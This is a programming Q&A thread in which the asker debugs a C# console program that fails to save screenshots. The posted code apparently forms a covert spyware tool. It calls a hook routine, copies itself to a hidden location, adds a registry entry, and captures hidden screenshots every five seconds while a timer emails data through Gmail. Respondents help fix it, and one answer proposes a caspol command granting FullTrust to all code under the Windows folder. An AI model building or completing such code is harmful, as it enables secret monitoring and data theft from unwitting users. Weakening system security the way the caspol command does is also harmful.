# C# console not taking screenshot

Tags: c#, screenshot

I'm trying to get my application to take a screenshot and save it in a folder, however everything works except for getting the screenshot saved into the folder.

**EDIT: running as admin**

**EDIT 2: After changing to documents, folder is created but still doesn't save any screenshots. still no errors..**

**EDIT 3:**

I fixed my issue, I guess my 2 timers were interfering with each other.. 
Well, the..

### "Application.Run();"

I had that bit in both timers. once I commented it out it works fine. see code for example.

```
Hook();
        if (File.Exists(dest) == false)
        {
            File.Copy(StartupPath(), dest, true);
            File.SetAttributes(dest, FileAttributes.Hidden);
            AddToReg();
        }

         if (Directory.Exists(fsc) == false)
         {
         DirectoryInfo di = Directory.CreateDirectory(fsc);
         di.Attributes = FileAttributes.Directory | FileAttributes.Hidden;
         }


        System.Timers.Timer myTimer = new System.Timers.Timer();
        myTimer.Elapsed += new ElapsedEventHandler(Program.sendEMailThroughGmail);
        myTimer.Interval = 60000; //30 mins 1800000
        myTimer.Enabled = true;
        myTimer.AutoReset = true;
        myTimer.Start();
        //Application.Run();
        GC.KeepAlive(myTimer);


        System.Timers.Timer scTimer = new System.Timers.Timer();
        scTimer.Elapsed += new ElapsedEventHandler(Program.Screenshot);
        scTimer.Interval = 5000;
        scTimer.Enabled = true;            
        scTimer.AutoReset = true;
        scTimer.Start();
        Application.Run();
        GC.KeepAlive(scTimer);

        UnHook();
```

**Still have the issue of not being able to save files into the windows folder.**

**Updated event**

```
public static void Screenshot(Object source, ElapsedEventArgs e)
     {
         Random random = new Random();
         try
         {

            Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
            using (Graphics g = Graphics.FromImage(bmp))
            {
                int number = random.Next(1000000);
                int screenwidth = Screen.GetBounds(new Point(0, 0)).Width;
                int screenheight = Screen.GetBounds(new Point(0, 0)).Height;
                g.CopyFromScreen(0, 0, 0, 0, new Size(screenwidth, screenheight));
                bmp.Save(fsc + number + ".jpg", ImageFormat.Jpeg);
                Console.WriteLine("Saved image" + number);
            }

        }
         catch (Exception ep)
         {
             Console.WriteLine("failed to capture screenshot with the following error:");
             Console.WriteLine(ep.Message);
         }

     }
```

Now creating and saving screenshots to a folder inside My Documents.

**Thank You!**

Would still like to be able to save the folder and files in the Windows folder, however might be a bigger issue then I'm ready to deal with at this time.

Comment: So your `Screenshot` method runs? Try saving any image to that folder using image program (mspaint) to see if you can in fact save images there.

Comment: @JohanP Hmm, doesn't allow me to save in the folder. but I'm the admin?

Comment: What OS are you using? Win10?

Comment: Yes windows 10, EDIT: folder was read only I changed that and can save mspaint file to it.  EDIT : stays read only after exit..?

Comment: I have the same issue at home. If I copy-paste anything to my `c:` drive, it will prompt me to "allow" it to paste there as this needs admin access, even tho I am admin. Just find a folder where you can save to and use that.

Comment: Hmm, Might just have to changed to a less "protected" folder. EDIT: same issue after changing folders.

Comment: Did you try saving it in your application folder? I.e. in your bin/debug or bin/release folder.

Comment: Yep, tried a few different places. (desktop, documents, bin folder) it gives me know feedback so I have no idea why its not working.

Comment: Cut the problem into pieces. Can you save any other file in the same folder? Can you actually print text to the console from `Screenshot`? Can you print right after the `Save` call? Are you using an output folder that isn't virtualized? Can you take the screenshot and display it in a form?

Comment: @JohanP That's a feature, really the whole point of UAC. Even if you run under an account with administrative rights, your applications only get standard user rights *unless* you explicitly elevate them (that's what the "Allow" does, and it cannot be faked by any user application on your system). The fact that there are still people who think that common applications should write their application data in `C:\Windows\screenshot` nicely illustrates why that's a good idea :)

Comment: @Luaan you might be onto somethings, I cannot write to the console from screenshot.

Comment: Do you actually have a console? The `Application.Run` suggests you have a windows forms application, which doesn't have a console by default (and just doing `Console.WriteLine` doesn't *create* a console).

Comment: Maybe I'm confused then, I have the console window running and I've used it before to fix issues.

Answer (score 0):

I tried your code (.net 4.6, windows 7) and I'm getting error (caught in catch block) "A generic error occurred in GDI+.". That string concatenation (that `number + ".jpg` part) looked a bit suspicious to me, so i tried few things:

1) make sure that the destination folder exists and then write to it (code is a bit lengthy, but I wanted it to be easier to follow):

```
//after gfx.CopyFromScreen....
string destinationPath = @"c:\windows\screenshots";
string destinationFileName = string.Format("{0}.{1}", number, "jpg");
if (!Directory.Exists(destinationPath))
    Directory.CreateDirectory(destinationPath);
string destinationFileAndPath = Path.Combine(destinationPath, destinationFileName);
bmpScreenshot.Save(destinationFileAndPath, ImageFormat.Jpeg);
```

2) tried to save to application's startup folder.

```
//after gfx.CopyFromScreen....
string destinationFileName = string.Format("{0}.{1}", number, "jpg");
string destinationFileAndPath = Path.Combine(Application.StartupPath, destinationFileName);
bmpScreenshot.Save(destinationFileAndPath, ImageFormat.Jpeg);
```

both solutions worked for me.

I couldn't reproduce your scenario, but I'm guessing `bitmap.Save` (for some reason) couldn't write to specified folder. Or maybe that folder didn't exist :)

There's also third possible solution - to allow all code to be executed on computer to supress all security issues.

Navigate to `Start -> Visual Studio 2015 -> Visual Studio Tools -> Developer Command Prompt` and there execute following command:

```
caspol -u -ag All_Code -url c:\windows\* FullTrust
```

After that, restart your application (or maybe your machine), and try again.
Once again, these are guesses but maybe something can help you.

Comment: Thanks, however after trying these, same issue still stands. Folder is created and I can manually save the file into the folder but still not able to get any screenshots.

Comment: @Adam, not even number 2, to save in application's folder?

Comment: not even in the applications folder. Luaan might be onto something tho, its not writing from screenshot to console.